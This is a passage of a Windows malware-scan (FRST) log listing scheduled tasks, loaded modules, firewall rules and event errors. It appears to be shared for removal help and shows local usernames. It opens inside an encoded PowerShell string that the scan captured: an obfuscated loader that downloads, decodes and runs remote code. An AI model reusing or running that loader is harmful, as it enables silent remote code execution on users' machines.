3AE8ANQBKADkANQA3AHgAbgBvAGsATgBFAE4AawBWAFUATwBoAHgAbQAxAHcAdAA1AEsAaQAxAEcAeQB5AGIAZABJAGQATwBMAGUANgB3AGsAbgByAG0AZQBEAFoAZAByAEIATQBXAE0ATwBPAEUAawBuAG4AbgAzAHIAdABwAG8AbQB6AHIAMgBhAEgAYQBTAGsAZQBPAEYATwBwAHAAZABMAEMAZABsAGYAbwBaAGoASwBhAEgAcgBzAHMANAA5AHYAYgBwAGEAaQBlAEIAbAB6AF8AZgBLAFcAbgAxAFIAeABkADkAMgBIADEAMwBhAGYAaQBvAGQAUQBKAHcAVwBCAE4AMwA5AEkAdwBXAFQASwBRADUAVwB0AHMAXwBFAHAASgBGAHkAdABxAHIAagB3AHEANQBCAFAAdwBGAE4ARwBFAHkAdwB3AHkAaABqADIAcAB6AEgAcwBNADAAcQBnAFgAMQBuAC0AYgBfAGkANwBFAGgAcgBaADQAYQBaADgASgA1AEEATQBSAHkANwBSAFMANQA5AHoATAA4AFcAMABrAEcAMQBlADgAVABMAFkAYwBPAEcAMwBmADQAZQByAG0AbwBLADIAVwBUAEgAdgBIAEYAYgBkAE8ANQBRAFUAdABBAGoASQBOAEwAXwB6AFIAXwAtAEgALQBrAE4AaAB3AEEAYgB1AGkAMwBzAFkAOQBMAEcAYwB1AHMAYgBqAF8ATQBmAHAATgAzAEwAeABJAEcAbQBOAFUAbABEAGcATABSADkANwBiAFkAYgB1ADkAUgBkAEsARwBrAG8ARQBUAHkAVQAwAHgANABnAFkAbQAxAFkASwBuAEQAUABWADMAcABiAGUAVQBaAFcAYwA2AHIAUgBhAFIAWQBqAE0AbABEAGkAZAA4AHkAVgBBAEYASABpAGsAUwAwAGMAYQBnAEYAYQBfAEQARABWAEoAcgAyAEwAMgBmAEsAMwBJADYAdQByAEYANQByAEEAMABfAFEASABZADcAMgAtAFgANwBhAEIARABMAGUARABlAHMAVgBaADUARABfAEEASQBHAFEARwByAEUAMwBXAHEANQBFAGUARQBTADAAZABOAE4AOQBBAG0AcQBfAFAAUgBzADkATAAwAGYAbwBQADMAMQBnADQAcgA2AFYAZABWADUAcgBZAGwARgAyADcAbgBmAGwAQwAxADUAVQBGAEkAWAB2AFcAZgBrADgAMABJAHkAaQBSAHkAVABUAGoANAA4AEQAcwBPAHMASgBFADkARABiADkAcQBiAHEAdwBpAHcAVgBaAEkAbgBMAHcAZgBTAGwAXwBkAEoAWgB1AFgARABXAFYAagB5AFQAZwBQAEEARAA0AGEANQBSAGYATQB2AGkAMwBuAGkANQA3AFcAVABiAHEARgBIAGMALQBKAHYANwBKADAAYQAtAEYANQBhAGsAYgBfAFEAbQBEAGMAOQBSADkATABHAEQAVQBkAFUAMwBHAEoASgBvADYANwBVAEIAYQAzAHAAdwBOADIATABqADIAYQBqADIALQBHAG0AbABHADIAWQBuAGMATABMAHcAMgBOAFIAcABPAHkALQBKAFMAUQBxAFMAaABSADUARgAtAEoAWAB0AEQATwBjAG4AOABMADAAdQBhAHcAQQBpADIAdQBhAEwAZQAyADcALQA0AEEANgAwAEMAdgB2AHQANwAtAEMATAB2AHMAZAAwAGQAcgByAEcAcwBvADcATgA4AEMAZgBkAFEAOQA5AE0AcQBRAEEAVwBqAEcASAAtAFUAVAAxAEwATgBDAG4AaABjAE4ATwBPAG0AQQBHAEsAUgBvADQALQBiADcAcwBVAGEARgBwAEEAYwBYAFQAbQBLAGcANwBMAFIAcwB2AG0AMAA3AFMAcgBBAEgATgBSAFoAaABRAEgARgBWAGMAcwBqADUATwBKAG8AQQBJAG4AeABqADUAbABoADIANwBFAGkAQwBtAFgAZQBQAEoAXwBGAGsAZwBJAEwAOQA2AEsARQB6AFoAMABLAGgALQA2AGsAVQBvAHgAcABPAFcANgA0AGEASgBHAHkAVABjAHAARgBIADIAcgBNAGMAYwBXAFEASgBRAEYAYwBhAFcAdgBWAGoAQgBCAEkAdwBMADIAcQBMAEgAZQAxAEcAawBWADYAUABPAGgAbQB1AEMAOQBjAGEAdABEAGYAeAAzAEYAVwByAHkATwBIAHAASABQAGoATgBjADIASABmAGQALQBKAG4AWQBQAHIAVwBVACYAcgA9ADUANAAwADMANQAzADUAMgA5ADEAOQA0ADQANgAwADQANAA3ADEAIgA7ACQAcwB0AHMAawA9ACIAewAwAEUAMABCADAARAA0ADcALQAwAEUAMAA4AC0ANwBEADAAQwAtADAARgAxADEALQAwADUAMABFADcARQA3AEUAMQAxADcAOQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAEwARQBGAE8ARgBTAEsAUwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {E11C5705-71C6-4159-A273-D013ADF11E46} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [2015-01-30] (Hewlett-Packard)
Task: {F40AE417-C53C-4B7D-9288-ACB8CD641C45} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-11-11 09:42 - 2015-11-11 09:42 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll
2015-08-16 12:08 - 2013-09-03 13:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll
2015-08-16 12:08 - 2015-08-13 17:36 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui
2015-12-18 17:53 - 2015-12-18 17:53 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll
2016-01-25 13:02 - 2016-01-25 13:02 - 01119064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpbr.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 00794832 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpdsp.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 03038112 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpph.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 01648408 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttprbl.mdl
2015-01-30 21:07 - 2015-01-30 21:07 - 02169344 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00035840 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2015-01-30 21:16 - 2015-01-30 21:16 - 00431696 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2015-01-30 21:16 - 2015-01-30 21:16 - 00746064 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2015-08-18 20:17 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-07 06:45 - 2015-12-07 06:45 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-07 06:45 - 2015-12-07 06:45 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-27 16:44 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-01-30 21:09 - 2015-01-30 21:09 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2015-12-18 18:11 - 2015-12-06 23:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-18 18:11 - 2015-12-06 23:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 21:39 - 2016-01-04 20:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 15:16 - 2016-01-16 00:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 15:16 - 2016-01-16 00:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-10-13 05:45 - 2015-10-13 05:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 05:45 - 2015-10-13 05:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-01-27 11:26 - 2016-01-27 11:26 - 09737216 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_2015.25.24.0_x64__8wekyb3d8bbwe\WinStore.Entertainment.Mobile.dll
2015-10-30 02:18 - 2015-10-30 02:18 - 02100064 _____ () C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
2016-01-13 21:39 - 2016-01-04 20:24 - 00936960 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-01-22 11:25 - 2016-01-22 11:26 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2014-10-10 11:37 - 2014-10-10 11:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-08-22 17:39 - 2015-08-22 17:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\AppVIsvStream32.dll
2016-01-22 11:25 - 2016-01-22 11:25 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-22 11:25 - 2016-01-22 11:26 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libglesv2.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libegl.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 16799048 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014 (1).exe:BDU
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014 (2).exe:BDU
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014.exe:BDU
AlternateDataStreams: C:\Users\sesay\Desktop\FRST64.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\ChromeSetup.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\CurseClientSetup.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\InstallPaladins.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\MEGAsyncSetup.exe:BDU
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 08:25 - 2015-12-23 08:50 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\MuhammadAkim\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\toshiba_wallpaper_sailboats.jpg
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\abang\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Control Panel\Desktop\\Wallpaper -> C:\Users\sesay\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img13.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\StartupApproved\Run: => "Gameo"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{313A0B34-8446-4C12-A65F-E4B0878B3235}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{77296244-CD34-4559-83EE-EAF023F89DB5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8444577F-8F21-4326-A3E3-C3F4D0CCBABC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0BBAD64B-1E94-416A-9BC4-7D136E7A5FBC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{CFBBD29C-D004-4467-AA8C-5254574A481F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{9A26AF2C-2797-405D-AE05-942BE2142FAF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{9710FDC8-445E-41EC-83F9-59B349E510F7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EBA377C4-E001-4E22-9B23-0005D0B6D4F1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{774D11D4-2F23-42DD-8F1C-C8D26029B90E}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{3DEFAA54-29A0-4529-9E02-EA157C6A4C90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C74CE9D2-5C23-42CF-9E28-309435A41C2A}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{ED088A7F-9EF0-45C6-A947-DCC29B27A1D1}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{73989EB3-9188-44D6-AEB0-CEF36E0D1014}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{F221BDBB-11A8-487A-8042-27768BD2DCB7}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{E82A5B6E-A2ED-4BF4-9592-C73440B3BA2F}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{0E9662D1-C856-4828-AC71-803929B44E3B}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{2CF0B8ED-39FA-4421-80B2-9A9F59723926}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{15F1EB6F-7897-4484-8C47-101BA1EBC48A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{F149568A-26C5-41F5-8550-C65471395703}] => (Allow) C:\Users\MuhammadAkim\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{5ACCE7A0-6EBD-4E40-9629-FEC93838A9D0}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{B09D31F1-FAD1-45C5-86F9-18539C6ABE4E}] => (Allow) LPort=2869
FirewallRules: [{5EE686D7-EA54-4E8B-BE97-18656F50F071}] => (Allow) LPort=1900
FirewallRules: [{63EFD60D-7453-4540-AAF7-EBD87C4CBF4D}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{214F2750-1440-4ADB-A6B3-3745D9641CAF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{359C58EA-A374-44A4-AD09-48056680F92B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Trove\GlyphClient.exe
FirewallRules: [{EDA71C7F-C96A-4826-8E61-0B6AE60B10CE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [{3811993D-AF72-4E9D-A3E6-43CF26C67BD6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe
FirewallRules: [{4A8101BD-B232-4A48-BFFB-BEAF490E04A7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
21-01-2016 15:32:30 Scheduled Checkpoint
25-01-2016 17:18:07 Kinect for Windows SDK v2.0_1409
30-01-2016 20:47:19 Windows Update
 
==================== Faulty Device Manager Devices =============
 
Name: Officejet 4500 G510n-z
Description: Officejet 4500 G510n-z
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/31/2016 07:33:45 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 07:27:15 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 06:51:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 06:21:25 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 05:47:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 05:06:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 04:45:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:44:10 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App failed with error: -2147024770 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:36:51 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Basement-pc)
Description: Activation of app Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App failed with error: -2147024770 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (01/31/2016 02:33:40 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073422302
 
 
System errors:
=============
Error: (01/31/2016 07:57:16 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:50:38 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:43:50 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:37:13 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:33:45 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivationCortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableBasement-pcsesayS-1-5-21-1436452318-2580999886-2786755032-1003LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:30:47 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:27:15 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
